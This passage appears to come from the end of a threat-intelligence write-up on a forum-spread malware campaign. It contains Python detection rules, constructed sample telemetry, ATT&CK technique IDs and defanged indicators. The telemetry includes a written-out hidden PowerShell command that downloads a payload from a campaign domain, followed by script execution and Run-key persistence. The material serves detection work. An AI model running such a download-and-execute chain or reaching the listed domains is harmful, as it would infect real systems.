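        host = ev["dest_host"].lower().removeprefix("www.")
        if host in WATCHLIST and _name(ev["image"]) not in BROWSERS:
            hits.append("non_browser_to_watchlisted_domain")
        if UUID_BEACON.match(ev.get("url_path", "")):
            hits.append("per_victim_uuid_beacon_path")
    return hits


# Constructed sample telemetry; paths and the Node.js folder name are assumptions.
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
_DROP = "C:\\ProgramData\\.NET Runtime Optimization Service c8w2i9KUtgpF\\"
_EXE = _DROP + "NET Runtime Optimization Service.exe"
SAMPLE_EVENTS = [
    {"id": "p1", "type": "process", "image": _PS,
     "parent_image": "C:\\Users\\victim\\AppData\\Local\\Microsoft\\WindowsApps\\wt.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -WindowStyle Hidden Invoke-WebRequest "
                "https://autoupdatet.com/get_update?i=75975 -OutFile C:\\ProgramData\\Update.zip"},
    {"id": "p2", "type": "process", "parent_image": _PS,
     "image": "C:\\ProgramData\\node-v7.10.1-win-x64\\node.exe",
     "cmdline": "node.exe C:\\ProgramData\\Update.js"},
    {"id": "l1", "type": "imageload", "image": _EXE, "loaded": _DROP + "mscoree.dll"},
    {"id": "r1", "type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
     "value_name": "NET Runtime Optimization Service 50Fs4tMIDVSm", "data": _EXE},
    {"id": "n1", "type": "network", "image": _EXE, "dest_host": "openanyworddocument.com",
     "url_path": "/api/init/40237612-00ac-4a85-bce9-7400f148c474"},
    # benign controls: a browser visiting the forum, and the genuine mscoree.dll
    {"id": "n2", "type": "network", "dest_host": "www.digitalpoint.com", "url_path": "/forums/",
     "image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"},
    {"id": "l2", "type": "imageload", "image": "C:\\Windows\\System32\\dfsvc.exe",
     "loaded": "C:\\Windows\\System32\\mscoree.dll"},
]


def run(events=SAMPLE_EVENTS) -> dict:
    """Map event id -> matched rule names."""
    return {ev["id"]: evaluate(ev) for ev in events}


if __name__ == "__main__":
    for event_id, hits in run().items():
        print(event_id, hits or "-")
```

The browser exclusion on the domain watchlist is deliberate: DigitalPoint and LetsDiskuss are legitimate communities, so only non-browser processes reaching them warrant a high-priority alert, as the text states. The hidden_bypass_powershell rule will fire on some administrative scripts and is best used as a scoring factor alongside the parent-process rule rather than on its own.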

MITRE ATT&CK Techniques

T1102.001 (Dead Drop Resolver)

T1189 (Drive-by Compromise)

T1204.004 (Malicious Copy and Paste)

T1204 (User Execution)

T1608.004 (Drive-by Target)

T1584.006 (Compromise Infrastructure: Web Services)

T1608.002 (Stage Capabilities: Upload Tool)

T1608.001 (Stage Capabilities: Upload Malware)

T1102.002 (Web Service: Bidirectional Communication)

T1195 (Supply Chain Compromise)

T1588.001 (Obtain Capabilities: Malware)

T1588.005 (Obtain Capabilities: Exploits)

T1608.006 (Stage Capabilities: SEO Poisoning)

T1583.008 (Acquire Infrastructure: Malvertising)

T1681 (Search Threat Vendor Data)

Indicators

hxxps://autoupdatet[.]com/get_update?i=75975

hxxps://openanyworddocument[.]com/api/init/40237612-00ac-4a85-bce9-7400f148c474

letsdiskuss[.]com

digitalpoint[.]com

autoupdatet[.]com

autoupdaters[.]com

autoupdatethis[.]com

openanyworddocument[.]com

kittyfreespace[.]com

searchdocumentsfree[.]com

97bc78ad3fd6549f3a7f9cb31be1ff25d50bac97c42fc6dfff44e47424c5add1 – Update.js

dff20059f161090c76f9f45ac2269f2965bdc96023c78c1072f8d1aa66b06919 – Batch file
